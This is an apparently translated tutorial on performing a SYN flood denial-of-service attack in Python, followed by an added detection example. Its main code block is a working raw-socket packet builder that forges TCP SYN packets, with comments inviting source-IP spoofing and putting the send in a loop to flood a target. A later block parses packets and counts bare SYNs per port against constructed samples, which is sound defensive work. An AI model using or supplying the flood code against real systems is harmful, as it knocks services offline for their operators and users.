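0x00 Background
SYN Flood is currently one of the most popular methods of DoS (denial of service) and DDoS (distributed denial of service) attack. It exploits a weakness in the TCP protocol: the attacker sends a large number of forged TCP connection requests so that the target's resources are exhausted (CPU at full load or insufficient memory).
0x01 Code
The purpose of this article is to introduce how to construct packets with Python.
A raw socket is used to send the packets. The program only works on Linux. On Windows you can try calling WinPcap.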
```python
'''
    Syn flood program in python using raw sockets (Linux)

    Silver Moon ([email protected])
'''

# some imports
import socket, sys
from struct import pack

# checksum function needed to calculate the TCP checksum
def checksum(msg):
    s = 0
    # loop taking 2 bytes at a time (msg must have an even length)
    for i in range(0, len(msg), 2):
        w = (msg[i] << 8) + msg[i+1]
        s = s + w

    # fold the carry bits back into the low 16 bits
    s = (s >> 16) + (s & 0xffff)
    s = s + (s >> 16)
    # complement and mask to a 2 byte short
    s = ~s & 0xffff

    return s

# create a raw socket
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
except socket.error as msg:
    print('Socket could not be created. Error Code : ' + str(msg.errno) + ' Message ' + str(msg.strerror))
    sys.exit()

# tell kernel not to put in headers, since we are providing it
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

# now start constructing the packet
packet = b''

source_ip = '192.168.1.101'
dest_ip = '192.168.1.1' # or socket.gethostbyname('www.google.com')

# ip header fields
ihl = 5
version = 4
tos = 0
tot_len = 20 + 20   # with IP_HDRINCL the kernel fills in the correct total length
id = 54321  # Id of this packet
frag_off = 0
ttl = 255
protocol = socket.IPPROTO_TCP
check = 10  # with IP_HDRINCL the kernel fills in the correct IP checksum
saddr = socket.inet_aton(source_ip)  # Spoof the source ip address if you want to
daddr = socket.inet_aton(dest_ip)

ihl_version = (version << 4) + ihl

# the ! in the pack format string means network order
ip_header = pack('!BBHHHBBH4s4s', ihl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)

# tcp header fields
source = 1234   # source port
dest = 80   # destination port
seq = 0
ack_seq = 0
doff = 5    # 4 bit field, size of tcp header, 5 * 4 = 20 bytes
# tcp flags
fin = 0
syn = 1
rst = 0
psh = 0
ack = 0
urg = 0
window = 5840   # advertised window size; pack('!H') already converts to network order
check = 0
urg_ptr = 0

offset_res = (doff << 4) + 0
tcp_flags = fin + (syn << 1) + (rst << 2) + (psh << 3) + (ack << 4) + (urg << 5)

# the ! in the pack format string means network order
tcp_header = pack('!HHLLBBHHH', source, dest, seq, ack_seq, offset_res, tcp_flags, window, check, urg_ptr)

# pseudo header fields
source_address = socket.inet_aton(source_ip)
dest_address = socket.inet_aton(dest_ip)
placeholder = 0
protocol = socket.IPPROTO_TCP
tcp_length = len(tcp_header)

psh = pack('!4s4sBBH', source_address, dest_address, placeholder, protocol, tcp_length)
psh = psh + tcp_header

tcp_checksum = checksum(psh)

# make the tcp header again and fill the correct checksum
tcp_header = pack('!HHLLBBHHH', source, dest, seq, ack_seq, offset_res, tcp_flags, window, tcp_checksum, urg_ptr)

# final full packet - syn packets dont have any data
packet = ip_header + tcp_header

# Send the packet finally - the port specified has no effect
s.sendto(packet, (dest_ip, 0))  # put this in a loop if you want to flood the target
```
Note: root privileges are required to run it.
Implementing a SYN Flood attack in Python
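Seen from the receiving side, the same header layout can be unpacked to verify the TCP checksum against the pseudo header and to count SYN segments that carry no ACK per destination port. This is an added example, not code from the original article; the function names, the threshold and the sample packets (documentation address ranges, built in memory and never sent) are assumptions made for illustration.

```python
import socket
import struct
from collections import Counter

def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total >> 16) + (total & 0xFFFF)
    return ~total & 0xFFFF

def parse_segment(packet: bytes):
    """Return (src, dst, dport, flags, checksum_ok) for one IPv4/TCP packet."""
    if len(packet) < 20 or packet[0] >> 4 != 4 or packet[9] != socket.IPPROTO_TCP:
        raise ValueError("not an IPv4/TCP packet")
    ihl = (packet[0] & 0x0F) * 4
    if ihl < 20 or len(packet) < ihl + 20:
        raise ValueError("truncated header")
    saddr, daddr, tcp = packet[12:16], packet[16:20], packet[ihl:]
    dport, flags = struct.unpack("!H", tcp[2:4])[0], tcp[13]
    pseudo = saddr + daddr + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(tcp))
    # A segment carrying a correct checksum sums (with the pseudo header) to 0.
    ok = inet_checksum(pseudo + tcp) == 0
    return socket.inet_ntoa(saddr), socket.inet_ntoa(daddr), dport, flags, ok

def bare_syn_counts(packets, threshold=3):
    """Count valid SYN-without-ACK segments per (dst, port); report >= threshold."""
    hits = Counter()
    for p in packets:
        _, dst, dport, flags, ok = parse_segment(p)
        if ok and (flags & 0x12) == 0x02:  # SYN set, ACK clear
            hits[(dst, dport)] += 1
    return {k: n for k, n in hits.items() if n >= threshold}

def build_sample(src, dst, sport, dport, flags):
    """Constructed in-memory test packet (never sent): 20-byte IP + 20-byte TCP."""
    s, d = socket.inet_aton(src), socket.inet_aton(dst)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 1, 0, 64, 6, 0, s, d)
    tcp = struct.pack("!HHLLBBHHH", sport, dport, 0, 0, 5 << 4, flags, 5840, 0, 0)
    csum = inet_checksum(s + d + struct.pack("!BBH", 0, 6, len(tcp)) + tcp)
    return ip + tcp[:16] + struct.pack("!H", csum) + tcp[18:]

# Constructed capture: four bare SYNs from different sources plus one SYN-ACK.
SAMPLE = [build_sample("198.51.100.%d" % i, "192.0.2.10", 1000 + i, 80, 0x02)
          for i in range(1, 5)]
SAMPLE.append(build_sample("192.0.2.10", "198.51.100.1", 80, 1001, 0x12))
```

Calling `bare_syn_counts(SAMPLE)` reports the one destination port that received at least three bare SYNs; segments with a bad checksum are ignored rather than counted.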